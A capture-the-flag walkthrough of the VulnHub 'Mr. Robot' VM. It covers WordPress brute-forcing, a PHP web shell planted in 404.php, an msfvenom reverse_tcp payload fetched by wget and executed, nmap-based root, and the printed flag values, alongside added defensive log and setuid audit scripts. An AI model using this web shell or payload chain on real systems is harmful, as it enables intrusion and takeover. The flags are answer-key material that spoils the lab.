Hello Friend.

This is my attempt at the Mr. Robot challenge released on VulnHub. Here is the link: https://www.vulnhub.com/entry/mr-robot-1,151/
And now, me trying to solve the challenge. I am expecting several problems and mistakes, but I believe it will help both of us: you, because you will see things from my perspective and be able to understand how I am thinking, and me, because I believe some of you will have suggestions to make. You can communicate with us via Facebook or the contact form of this website.

For this to work, try to read every sentence in Elliot's voice 😛

First touch of our target!
Who is our target? Mr. Robot. What is our goal? To find 3 unique keys. What do we have to do first? Find where our target is. We are going to be obvious on this step and open nmap to enumerate the computers on my network.

I will assume that I do not have physical access to the machine. This means that I will not try to log in via VirtualBox.

Enumerating the system:

We need to find the computer's IP address in order to investigate the device further. I am thinking of nmap right now, but we are going to scan a range of IPs in order to find the right one. Things can be a little tricky on host discovery: we must scan 65535 ports on every host, and we have 254 possible hosts, which equals 65535*254 possible connections. nmap will take an eternity to finish, so we must find another way. The obvious way is to limit the ports, but we do not have any information about the system, which means that we must guess the port or trust our luck. I want to try something different: I will open Wireshark and try to sniff every packet on my network for about 5 minutes. Another solution could be masscan. Masscan is a tool created for scanning multiple hosts in a small amount of time. GitHub repository for masscan: https://github.com/robertdavidgraham/masscan. Just for fun I am going to run a scan with masscan, just to see the calculated amount of time required to scan the whole network.

As you can see it was not the best idea ever :P.

Ok, the 5 minutes have passed and Wireshark did not find the IP. That's a shame 🙁
We are going with plan B: let's scan the first 100 ports, hoping to get something. What I would normally do is put the most common ports there, but whatever… To be honest I hope that port 80 will be open :D. Here is a list of the most common ports: http://www.webopedia.com/quick_ref/portnumbers.asp

Yes, I changed my terminal profile… I reinstalled my Ubuntu recently and this lab is my first on this machine… I have not even installed all of my tools yet 😛

As we can see in the above picture, nmap successfully found some hosts. By visiting 192.168.56.101 we can see that this is our target. Let's see if we can find anything else on it.
I am going to make a complete scan for services on unusual ports as well as OS discovery: nmap -sT -A -p- 192.168.56.101

The scan has completed and, as we can see in the above picture, we do not have many choices. Let's visit the site with our browser (on both ports 443 and 80).
Both services lead to the following screen:

It may sound silly, but the first thing I did when the above screen came up was to type the IP from the first line into my browser. I had no luck, but it was worth the shot. I am going to play with the commands for some time.

Ok, after I played with the commands for some time, I noticed two interesting things. First, the prepare command shows a picture with this site: whoismrrobot.com, and the join command asks for an email address.

After visiting whoismrrobot.com and seeing the terminal, the first thing I did was check whether the commands of the site worked on the terminal of my virtual environment, but they did not.

Ok, it is time to have a look at the source code of the page.
These lines gave us some basic info:

<link rel='stylesheet' id='genericons-css' href='http://192.168.56.101/wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2' type='text/css' media='all' />
<link rel='stylesheet' id='twentyfifteen-style-css' href='http://192.168.56.101/wp-content/themes/twentyfifteen/style.css?ver=4.3.1' type='text/css' media='all' />

wp-content, which basically screams that this is a WordPress website. Yes, I know that we could use a WhatCMS tool, but why would we want to fill the server's logs? This was faster and easier.
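The same passive check can be scripted so it works on any saved page source, which is also how a site owner can see what their own front page gives away. This is an added example and not code from the post; the HTML sample is constructed from the two link tags quoted above plus one wp-includes script tag, and the reading of the ?ver= value on style.css as the core version is an assumption (WordPress stamps it with the core version unless the theme sets its own), so the code returns it only as a hint.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample: the two <link> tags quoted in the post, plus one
# wp-includes script tag of the kind a WordPress page normally carries.
SAMPLE_HTML = """
<link rel='stylesheet' id='genericons-css' href='http://192.168.56.101/wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2' type='text/css' media='all' />
<link rel='stylesheet' id='twentyfifteen-style-css' href='http://192.168.56.101/wp-content/themes/twentyfifteen/style.css?ver=4.3.1' type='text/css' media='all' />
<script type='text/javascript' src='http://192.168.56.101/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script>
"""

# Any href= or src= attribute value, single- or double-quoted.
URL_RE = re.compile(r"""(?:href|src)=['"]([^'"]+)['"]""", re.IGNORECASE)
THEME_RE = re.compile(r"/wp-content/themes/([^/?#]+)/")
PLUGIN_RE = re.compile(r"/wp-content/plugins/([^/?#]+)/")


def fingerprint_wordpress(html):
    """Return what the served HTML gives away about a WordPress install.

    is_wordpress: any asset served from /wp-content/ or /wp-includes/
    themes / plugins: names taken from asset paths
    version_hint: the ?ver= on the active theme's style.css (assumed to be
                  the core version unless the theme overrides it)
    """
    themes, plugins, version_hint = set(), set(), None
    is_wordpress = False
    for url in URL_RE.findall(html):
        parsed = urlparse(url)
        path = parsed.path
        if "/wp-content/" not in path and "/wp-includes/" not in path:
            continue
        is_wordpress = True
        theme = THEME_RE.search(path)
        if theme:
            themes.add(theme.group(1))
            if path.endswith("/style.css"):
                ver = parse_qs(parsed.query).get("ver")
                if ver:
                    version_hint = ver[0]
        plugin = PLUGIN_RE.search(path)
        if plugin:
            plugins.add(plugin.group(1))
    return {
        "is_wordpress": is_wordpress,
        "themes": sorted(themes),
        "plugins": sorted(plugins),
        "version_hint": version_hint,
    }


if __name__ == "__main__":
    print(fingerprint_wordpress(SAMPLE_HTML))
```

Run it on a saved copy of your own site's front page; if it reports a theme name and a version hint, that is exactly what a visitor learns without touching wp-admin or leaving anything unusual in the access log.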

Now I will go to https://192.168.56.101/wp-admin/ and try some well-known credentials. None of them worked. Let's scan the site with wpscan in order to find any possible vulnerabilities! The first idea was to enumerate the users of the site in order to make a quick brute-force attempt, but I failed miserably, so I went for the plugins… We have some pretty results.

Easy info: https://wpvulndb.com/vulnerabilities/7857
Running the exploit:

I will have a look on the database of the website later.

This is what I wanted to see: https://wpvulndb.com/vulnerabilities/8714

By searching really quick on exploit-db I found this: https://www.exploit-db.com/exploits/40968/

The moment I found the exploit I took a quick break of one hour and ate some chocolate… I was thinking about the challenge and reminded myself of our goals. I was thinking about where those keys would be hidden… the first idea was the HTTP headers. I had no luck, but the moment I sat back at my computer I saw the robots.txt file somewhere on my terminal and I decided to have a look. We found our first key (Yayy :D) http://192.168.56.101/robots.txt

Key: 073403c8a58a1f80d943455fb30724b9

What would fsocity.dic be? It is not a file or a command… I will just keep it there for later use.

Now it is time to execute the exploit… Well, it did not work… That is unfortunate… Am I missing something?

I fired a scan with nikto… I did not find anything useful, but the public files have information related to the TV show.
license.txt: "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"

After 1 hour of searching for exploits, testing the vulnerabilities and scanning, I finally realized that I wrote the fsocity.dic file name wrong when I was checking whether it was a file on the server… I accidentally wrote: 192.168.56.101/fsociety.dat
fsociety.data ~ Do not delete this 😉 (some of you got it :P)

In the end it was a file with a list of passwords… this means that we have to brute-force wp-admin, obviously?
We have the passwords, but what username should we use? We are going to try root first because, when we visited the site, it was the username that was typed on the login screen. What other usernames could it be? I am thinking of the following list:

1. root
2. elliot
3. tyrell
4. mrrobot

Let's start our first attempt: ruby wpscan.rb --url 192.168.56.101 --wordlist ~/Downloads/fsocity.dic --username root

This will take some time… I am going to eat something (again) 😛

Finally. Username: elliot Password: ER28-0652

It took me freaking 8 hours…

Let's look around the panel… For some reason Elliot's psychologist Krista Gordon has an account…

By looking at Krista Gordon's profile, can we see another key?

That is an interesting username. Let's continue to Elliot's profile.

By following the wiki link we can see that Elliot is employee number ER28-0652

Ok, it is time to upload our shell. By modifying the 404.php page with the WordPress theme editor we can easily execute commands on the operating system. I added these lines after the <?php of the 404.php page of WordPress:

echo "Begin of shell\n<br>";
$out = array();
exec($_GET['c'], $out);   // run the value of the c= query parameter, collect output lines
foreach ($out as $line) {
    echo $line . "<br>";
}
echo "\n<br>End of shell";

By visiting https://192.168.56.101/wordpress/404.php?c=COMMAND I can execute my command and observe the output.
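Both of the steps that got us here, the wordlist run against wp-login.php and the commands sent through the edited 404.php, leave a very recognisable trail in the web server's access log. The script below is an added example, not part of the post or of WordPress: it parses Apache combined-format lines and reports (a) clients that POST to wp-login.php repeatedly, using the fact that WordPress answers a failed login with 200 and a successful one with 302, and (b) direct requests to a .php file outside the normal WordPress entry points whose query parameter looks like a shell command. The log lines are constructed to mirror the activity described above; the login threshold and the command word list are assumptions to tune to your own site.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines modelled on the post's activity:
# a wordlist run against wp-login.php that ends in a 302, then GET requests
# to the edited 404.php with commands in the c= parameter. 192.168.56.50 is
# a constructed ordinary visitor who logs in once and searches for "wget".
SAMPLE_LOG = """\
192.168.56.1 - - [10/Jan/2017:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3201 "-" "WPScan v2.9.3"
192.168.56.1 - - [10/Jan/2017:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3201 "-" "WPScan v2.9.3"
192.168.56.1 - - [10/Jan/2017:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3201 "-" "WPScan v2.9.3"
192.168.56.1 - - [10/Jan/2017:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3201 "-" "WPScan v2.9.3"
192.168.56.1 - - [10/Jan/2017:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3201 "-" "WPScan v2.9.3"
192.168.56.1 - - [10/Jan/2017:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v2.9.3"
192.168.56.50 - - [10/Jan/2017:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.168.56.50 - - [10/Jan/2017:10:05:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Jan/2017:10:20:00 +0000] "GET /wordpress/404.php?c=wget%20http://192.168.56.1/payload%20-P%20../tmp/test HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Jan/2017:10:21:00 +0000] "GET /wordpress/404.php?c=chmod%20755%20../tmp/test/payload HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.168.56.50 - - [10/Jan/2017:10:22:00 +0000] "GET /?s=wget+tutorial HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumed word list: the commands the post ran through its shell plus a few usual suspects.
SHELL_WORDS = {"wget", "curl", "chmod", "cat", "id", "whoami", "uname", "ls", "nc", "bash", "sh"}
SHELL_META = set(";|&`$")
# PHP files that legitimately receive direct requests on a WordPress site.
WP_ENTRY_POINTS = {"index.php", "wp-login.php", "xmlrpc.php", "wp-cron.php", "wp-comments-post.php"}


def looks_like_command(value):
    """Heuristic: first word is a known command, or shell metacharacters are present."""
    value = value.strip()
    if not value:
        return False
    return value.split()[0] in SHELL_WORDS or any(ch in SHELL_META for ch in value)


def parse_line(line):
    """Split one combined-format line into ip, method, path, decoded query and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)  # parse_qs percent-decodes the values
    return rec


def analyze(log_text, login_threshold=5):
    logins = defaultdict(lambda: {"attempts": 0, "succeeded": False})
    shell_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            entry = logins[rec["ip"]]
            entry["attempts"] += 1
            if rec["status"] == 302:
                entry["succeeded"] = True
        basename = rec["path"].rsplit("/", 1)[-1]
        direct_php = (rec["path"].endswith(".php")
                      and basename not in WP_ENTRY_POINTS
                      and not rec["path"].startswith("/wp-admin/"))
        if direct_php:
            for name, values in rec["query"].items():
                for v in values:
                    if looks_like_command(v):
                        shell_hits.append({"ip": rec["ip"], "path": rec["path"], "param": name, "command": v})
    bruteforce = {ip: e for ip, e in logins.items() if e["attempts"] >= login_threshold}
    return {"bruteforce": bruteforce, "shell_hits": shell_hits}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The search request for "wget tutorial" is deliberately in the sample: it is not a direct hit on a .php file, so it is not reported, while the two 404.php requests are. On the prevention side, the theme editor that made the 404.php change possible can be switched off with `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which is a standard WordPress setting.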

After playing some time with commands to observe the system I accidentally found the second key. It is in the directory /home/robot

To be honest I do not want to wait another 5 hours to crack the above hash… I will just use an online MD5 cracker (it is a public challenge… it is almost certain that it will be cracked instantly). The password is: abcdefghijklmnopqrstuvwxyz

We have a username and a password, and we know from our first nmap scan that there is an SSH service on a closed port on the server… Let's open the port and try to connect to SSH.

This requires sudo, so let's try some simple tricks here. I am running the following command:

echo "abcdefghijklmnopqrstuvwxyz" | sudo ufw allow 22

It did not work… Should I go the traditional way and try to download and install Meterpreter?

I generated my payload using the following command: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f elf -a x86 --platform linux -o /var/www/payload

I started my Apache server in order to download the payload on the target machine.

I found a folder with write permissions and executed the following command: https://192.168.56.101/wordpress/404.php?c=wget%20-o%20../tmp/payload2%20-P%20../tmp/test%20http://192.168.56.1/payload

I changed the permissions of the file in order to execute it by typing: https://192.168.56.101/wordpress/404.php?c=chmod 755 ../tmp/test/payload

Finally I executed the file by typing: https://192.168.56.101/wordpress/404.php?c=../tmp/test/payload

Now I have a Meterpreter session open in Metasploit.
Now we will try to become root… getprivs failed, so we need to think of something else.

Funny thing… I tried to cat the key-2-of-3.txt file but I did not have the permissions to do it… I thought that it was empty and that we only had one password… This is interesting… we know where our next clue would be… we still have to log in as user robot…

Typing su robot and the password, we gain robot's privileges. We can see that there is another hash in the file: 822c73956184f694993bede3eb39f959

Ok, at this point I am not sure how I could gain root privileges… I will just enumerate the services which are running and hope that I will think of something…

After 45 minutes:

I will be honest… I got tired and had a quick look on Google, and I found out that I can do it with nmap… well, I will try the obvious…
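The post does not spell out what nmap offered here; the usual reason a stock tool hands out root is that its binary carries the setuid bit, which is the assumption behind this added example (not code from the post or the VM). It is written from the administrator's side: given (path, mode) pairs, it reports setuid executables that are not on an expected baseline, and, since the meterpreter drop above relied on a world-writable folder under the web root, it also reports world-writable directories that lack the sticky bit. The baseline and the sample entries are constructed; walk_modes() feeds the same audit with real data from a live host.

```python
import os
import stat

# Assumed baseline of setuid binaries on a stock Debian/Ubuntu web server;
# trim or extend it to match your own build.
EXPECTED_SETUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount",
    "/bin/umount", "/bin/ping",
}

# Constructed sample: (path, st_mode) pairs as os.lstat would return them.
# The setuid nmap and the world-writable theme folder are the two findings
# this example is about; /tmp is world-writable but sticky, so it is fine.
SAMPLE_ENTRIES = [
    ("/usr/bin/sudo", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/local/bin/nmap", 0o104755),
    ("/bin/ls", 0o100755),
    ("/tmp", 0o41777),
    ("/var/www/html/wordpress/tmp", 0o40777),
    ("/var/www/html/wordpress/index.php", 0o100644),
]


def audit(entries, expected_setuid=EXPECTED_SETUID):
    """Return setuid regular files outside the baseline and non-sticky world-writable dirs."""
    findings = {"unexpected_setuid": [], "world_writable_dirs": []}
    for path, mode in entries:
        if stat.S_ISREG(mode) and mode & stat.S_ISUID and path not in expected_setuid:
            findings["unexpected_setuid"].append(path)
        if stat.S_ISDIR(mode) and mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            findings["world_writable_dirs"].append(path)
    return findings


def walk_modes(root="/"):
    """Yield (path, st_mode) for every file and directory under root, skipping symlinks."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISLNK(st.st_mode):
                continue
            yield full, st.st_mode


if __name__ == "__main__":
    print(audit(SAMPLE_ENTRIES))
    # On a real host: print(audit(walk_modes("/usr")))
```

Anything the audit lists as unexpected setuid is a binary that runs with its owner's privileges for every local user, which is exactly the property that turned a web-shell foothold into root here; a world-writable, non-sticky directory under the web root is what let the payload be staged in the first place.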

Now let's search for the third key… And obviously I will look in the root directory for it 😉

Yep… here it is, our third and last key: 04787ddef27c3dee1ee161b21670b4e4

Conclusion:

It was not a very difficult lab, but to be honest it was very fun… I am loving this show and the lab was very interesting…

I hope you guys liked the topic and had a great time… It took me more hours than I expected and I got very tired on the last challenge, but well, I cheated! 😛
I would be happy to hear any suggestions or requests for tips.

Thank you very much 🙂